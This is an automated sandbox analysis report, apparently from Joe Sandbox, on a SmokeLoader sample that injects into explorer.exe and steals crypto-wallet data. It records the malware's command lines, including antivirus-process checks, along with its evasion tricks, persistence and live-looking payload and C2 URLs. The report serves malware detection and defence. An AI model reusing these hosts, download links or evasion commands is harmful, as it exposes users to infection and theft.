        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99637s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99528s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99401s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99265s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -99139s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Result.exe TID: 2520Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeCode function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 100000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99872Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99749Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99640Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99531Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99415Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99292Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99169Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 99039Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98920Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98812Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98698Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98562Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98451Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeThread delayed: delay time: 98342Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 100000
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99857
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99746
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99637
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99528
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99401
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99265
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 99139
        Source: C:\Users\user\AppData\Roaming\Result.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
        Source: explorer.exe, 00000001.00000000.1715441485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000001.00000000.1714985098.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 00000001.00000000.1714985098.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 00000001.00000000.1715441485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
        Source: 3E6C.exe, 0000000C.00000002.3944839716.0000000001001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
        Source: explorer.exe, 00000001.00000000.1712334658.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000001.00000000.1715441485.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
        Source: explorer.exe, 00000001.00000000.1714985098.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
        Source: explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714985098.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000011.00000002.4051151756.0000024B321D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
        Source: explorer.exe, 00000001.00000000.1715441485.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
        Source: explorer.exe, 00000001.00000000.1712334658.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 00000001.00000000.1714985098.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: RegAsm.exe, 0000000D.00000002.4129397616.00000000011BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000001.00000000.1712334658.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSystem information queried: CodeIntegrityInformationJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_00406328
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00880D90 mov eax, dword ptr fs:[00000030h]0_2_00880D90
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0088092B mov eax, dword ptr fs:[00000030h]0_2_0088092B
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008AD361 push dword ptr fs:[00000030h]0_2_008AD361
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00880D90 mov eax, dword ptr fs:[00000030h]5_2_00880D90
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0088092B mov eax, dword ptr fs:[00000030h]5_2_0088092B
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00A2AC01 push dword ptr fs:[00000030h]5_2_00A2AC01
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Benign windows process drops PE files
        Source: C:\Windows\explorer.exeFile created: 77D2.exe.1.drJump to dropped file
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 45.118.248.184 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.185.146.136 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 51.79.230.147 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.181 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 101.99.94.162 80Jump to behavior
        Creates a thread in another existing process (thread injection)
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeThread created: C:\Windows\explorer.exe EIP: 31519D0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseThread created: unknown EIP: 87C19D0Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\jagviseSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Result.exe "C:\Users\user\AppData\Roaming\Result.exe"
        Source: C:\Users\user\AppData\Roaming\Result.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: Bookings.7.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: explorer.exe, 00000001.00000000.1712534989.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713361838.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714985098.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000001.00000000.1712534989.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4128715660.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000001.00000000.1712334658.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
        Source: explorer.exe, 00000001.00000000.1712534989.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4128715660.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000001.00000000.1712534989.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4128715660.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3E6C.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\Result.exeQueries volume information: C:\Users\user\AppData\Roaming\Result.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\Result.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\Result.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,7_2_00406831
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Electrum
        Source: RegAsm.exe, 0000000D.00000002.4131492576.0000000002E0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty@fihkakfobkmkjojpchpfgcmhfjnmnfpi
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Exodus Web3@jiidiaalihmmhddjgbnbgdfflelocpak
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Ethereum
        Source: 3E6C.exe, 0000000C.00000002.4108127841.0000000006910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
        Source: Yara matchFile source: 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3284, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts1
        Windows Management Instrumentation        		111
        Scripting        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		11
        Input Capture        		3
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		13
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API        		1
        DLL Side-Loading        		312
        Process Injection        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory116
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Exploitation for Client Execution        		1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		2
        Obfuscated Files or Information        		Security Account Manager511
        Security Software Discovery        		SMB/Windows Admin Shares11
        Input Capture        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Scheduled Task/Job        		2
        Registry Run Keys / Startup Folder        		2
        Registry Run Keys / Startup Folder        		2
        Software Packing        		NTDS141
        Virtualization/Sandbox Evasion        		Distributed Component Object Model1
        Clipboard Data        		4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets4
        Process Discovery        		SSHKeylogging225
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
        Process Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Hidden Files and Directories        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582512 Sample: hoEtvOOrYH.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 74 webdot.ddns.net 2->74 76 www.tazc.com.my 2->76 78 7 other IPs or domains 2->78 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 106 13 other signatures 2->106 10 hoEtvOOrYH.exe 2->10         started        13 jagvise 2->13         started        signatures3 104 Uses dynamic DNS services 74->104 process4 signatures5 128 Detected unpacking (changes PE section rights) 10->128 130 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->130 132 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->132 140 4 other signatures 10->140 15 explorer.exe 66 10 10->15 injected 134 Antivirus detection for dropped file 13->134 136 Multi AV Scanner detection for dropped file 13->136 138 Machine Learning detection for dropped file 13->138 process6 dnsIp7 84 upadaria.org 192.185.146.136, 443, 50064 UNIFIEDLAYER-AS-1US United States 15->84 86 midginvineco.com 23.145.40.181, 443, 49760, 49962 SURFAIRWIRELESS-IN-01US Reserved 15->86 88 4 other IPs or domains 15->88 48 C:\Users\user\AppData\Roaming\jagvise, PE32 15->48 dropped 50 C:\Users\user\AppData\Local\Temp\C3F.exe, PE32 15->50 dropped 52 C:\Users\user\AppData\Local\Temp\A723.exe, PE32 15->52 dropped 54 3 other malicious files 15->54 dropped 90 System process connects to network (likely due to code injection or exploit) 15->90 92 Benign windows process drops PE files 15->92 94 Deletes itself after installation 15->94 96 2 other signatures 15->96 20 A723.exe 19 15->20         started        24 C3F.exe 15->24         started        26 3E6C.exe 15 4 15->26         started        29 3 other processes 15->29 file8 signatures9 process10 dnsIp11 56 C:\Users\user\AppData\Local\Temp\Bookings, PE32 20->56 dropped 58 C:\Users\user\AppData\Local\Temp\Threesome, data 20->58 dropped 60 C:\Users\user\AppData\Local\Temp\Sucking, data 20->60 dropped 70 7 other malicious files 20->70 dropped 114 Multi AV Scanner detection for dropped file 20->114 116 Writes many files with high entropy 20->116 31 cmd.exe 2 20->31         started        62 C:\Users\user\AppData\Local\...\Wisdom, data 24->62 dropped 64 C:\Users\user\AppData\Local\...\Spare, data 24->64 dropped 72 6 other malicious files 24->72 dropped 33 cmd.exe 24->33         started        80 lotuseffectllc.com 192.185.175.158, 443, 50067, 50077 UNIFIEDLAYER-AS-1US United States 26->80 66 C:\Users\user\AppData\Roaming\Result.exe, PE32 26->66 dropped 68 C:\Users\user\AppData\Roaming\...\Result.vbs, ASCII 26->68 dropped 118 Machine Learning detection for dropped file 26->118 120 Found many strings related to Crypto-Wallets (likely being stolen) 26->120 122 Drops VBS files to the startup folder 26->122 124 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->124 82 webdot.ddns.net 87.120.115.216, 50073, 50078, 8080 UNACS-AS-BG8000BurgasBG Bulgaria 29->82 126 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->126 35 Result.exe 29->35         started        file12 signatures13 process14 signatures15 38 conhost.exe 31->38         started        40 tasklist.exe 1 31->40         started        42 findstr.exe 1 31->42         started        46 2 other processes 31->46 44 conhost.exe 33->44         started        108 Multi AV Scanner detection for dropped file 35->108 110 Machine Learning detection for dropped file 35->110 112 Suspicious execution chain found 35->112 process16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        hoEtvOOrYH.exe61%ReversingLabsWin32.Trojan.OutSteel
        hoEtvOOrYH.exe100%AviraHEUR/AGEN.1312567
        hoEtvOOrYH.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\jagvise100%AviraHEUR/AGEN.1312567
        C:\Users\user\AppData\Roaming\Result.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\3E6C.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\jagvise100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\3E6C.exe39%ReversingLabs
        C:\Users\user\AppData\Local\Temp\77D2.exe5%ReversingLabs
        C:\Users\user\AppData\Local\Temp\A723.exe71%ReversingLabsWin32.Adware.RedCap
        C:\Users\user\AppData\Local\Temp\Bookings3%ReversingLabs
        C:\Users\user\AppData\Local\Temp\C3F.exe13%ReversingLabs
        C:\Users\user\AppData\Roaming\Result.exe39%ReversingLabs
        C:\Users\user\AppData\Roaming\jagvise61%ReversingLabsWin32.Trojan.OutSteel

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://lotuseffectllc.com0%Avira URL Cloudsafe
        http://wga2s.cc/tmp/index.php0%Avira URL Cloudsafe
        https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp40%Avira URL Cloudsafe
        http://volisolsa.com.ua/tmp/index.php0%Avira URL Cloudsafe
        https://upadaria.org/Vmujqcxm.exe0%Avira URL Cloudsafe
        https://firemane.org/Birge.exe0%Avira URL Cloudsafe
